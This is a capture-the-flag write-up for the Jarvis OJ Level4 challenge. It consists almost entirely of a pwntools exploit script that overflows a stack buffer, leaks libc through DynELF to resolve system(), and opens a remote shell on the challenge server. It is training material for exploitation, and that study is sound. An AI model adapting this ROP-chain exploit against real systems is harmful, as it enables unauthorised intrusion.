Jarvis OJ-Level4

借助DynELF实现无libc的漏洞利用小结

#!/usr/bin/env python

# coding:utf-8

from pwn import *

# Addresses are taken straight from the challenge binary's symbol table and
# used as absolute pointers, which only works for a non-PIE binary loaded at
# a fixed address; PIE/ASLR would require leaking a base first (inferred from
# the absence of any base-address arithmetic below).
elf = ELF('level4')

# PLT stub of write(): called directly from the ROP chain, so no libc
# address is needed to leak memory.
write_plt = p32(elf.symbols['write'])

# Return target after each call: re-entering _start restarts the program so
# the same overflow can be triggered again for the next chain.
start_addr = p32(elf.symbols['_start'])

# PLT stub of read(): used later to place a string in writable memory.
read_plt = p32(elf.symbols['read'])

# Writable scratch area (start of .bss) used as the destination of read().
data_addr = p32(elf.symbols['__bss_start'])

# Padding up to the saved return address: presumably 0x88 bytes of buffer
# plus 4 bytes of saved EBP (offset found by debugging — confirm against the
# binary). Reaching the return address this way implies no stack canary.
junk = "A" * (0x88 + 4)

# Connection to the remote challenge service; every payload below goes here.
Io = remote("pwn2.jarvisoj.com", 9880)

def leak(addr):

    """Return 4 raw bytes of target memory at ``addr``.

    Leak callback for pwntools' DynELF: the chain calls write(1, addr, 4)
    and then returns to _start so the program is ready for the next request.
    DynELF calls this repeatedly while walking the loaded ELF/link_map
    structures, so a single leak cannot be used in isolation.
    """

    payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)

    Io.send(payload)

    # recv(4) returns at most 4 bytes; DynELF expects exactly 4 — TODO confirm
    # this holds reliably on the target.
    leaked = Io.recv(4)

    # Python 2 print statement; the script does not run under Python 3.
    print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)),  repr(leaked))

    return leaked


# leak the address of system()

# DynELF resolves libc symbols through leak() by walking the target's own
# dynamic-linking structures, so no local copy of the remote libc is needed.
# From a hardening standpoint this is what full RELRO / PIE / stack canaries
# are meant to make impractical; none of them appear to be active here.
d = DynELF(leak, elf=ELF("./level4"))

system_addr = d.lookup('system', 'libc')

# Python 2 print statement.
print "[system()] -> [%s]" % (hex(system_addr))


# write /bin/sh

# Chain: read(0, .bss, 8), then return to _start.
payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)

Io.send(payload)


# send /bin/sh

# The 8 bytes consumed by the read() call above (7 chars + NUL).
Io.send("/bin/sh\x00")


# call system

#read_output()

# Chain: system(.bss) with 0xFFFFFFFF as a dummy return address; the process
# is not expected to return cleanly from this call.
payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr

Io.send(payload)


# interactive()

# Hand the connection over to the user.
Io.interactive()

  
